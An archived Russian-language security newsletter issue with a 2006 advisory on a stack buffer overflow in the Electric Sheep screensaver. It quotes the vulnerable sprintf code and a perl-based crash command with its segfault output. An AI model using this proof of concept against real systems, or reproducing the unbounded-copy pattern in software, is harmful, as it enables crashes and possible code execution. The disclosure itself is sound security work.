Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Январь 2006  
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
18.01.2006
03:05:14
07:05:25
19
20
21
22
23
24
25
26
27
28
29
30
31
Автор
Forester

Статистика

1.394 подписчиков
-1 за неделю
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности


Информационный Канал Subscribe.Ru
Компьютер для продвинутых пользователей
Содержание:
Electric Sheep
ПО: Electric Sheep
Версия: 2.6.3

О ПО:
Electronic Sheep - это свободный продукт с открытым исходным кодом, который используется как хранитель экрана тысячами людей по всему миру. Его можно установить на любой компьютер PC или MAC. Когда компьютер переходит в спящий режим, хранитель экрана запускается и соединяет компьютер с другими компьютерами по Интернету, что бы совместно использовать ресурсы для создания приложений.
Описание:
Из-за недостаточной проверки границ, большой параметр идентификатора окна может заставить стек основного буфера переполниться, позволяя выполнить произвольный код с привилегиями основного пользователя. Это возможно использовать как точку бекдора.
Ошибка содержится в файле electricsheep.c:
default_background(char *more) {
char ob[MAXBUF];
char pbuf[MAXBUF];
char qbuf[MAXBUF];

if (nobg || (!on_root && !window_id)) return;
if (more)
sprintf(ob, "-merge -at 500,0 s.tif",
splash_prefix, more);
else
ob[0] = 0;

if (window_id)
sprintf(qbuf, "-windowid %s", window_id);
Так как windows_id приходит непосредственно из командной строки, любой пользователь имеет возможность сделать windows_id большем, чем в параметре MAXBUF и выполнить переполнение буфера. Уязвимость более заметна при выполнении команды:
electricsheep -window-id `perl -e '{print "A"x"40000";}'`

Bad integer argument for the windowid option
Usage: xsetbg [global options] {[image options] image_name ...}
Type `xsetbg -help [option ...]' for information on a particular option, or
`xsetbg -help' to enter the interactive help facility.
subprocess failure: splash0, 256=1<<8+0
Segmentation fault
Использование:
Эта уязвимость клиента sheep'а может служить для создания бекдоров в системе.
Electric Sheep
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора		 Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки		 Отписаться Вебом Почтой
Вспомнить пароль
В избранное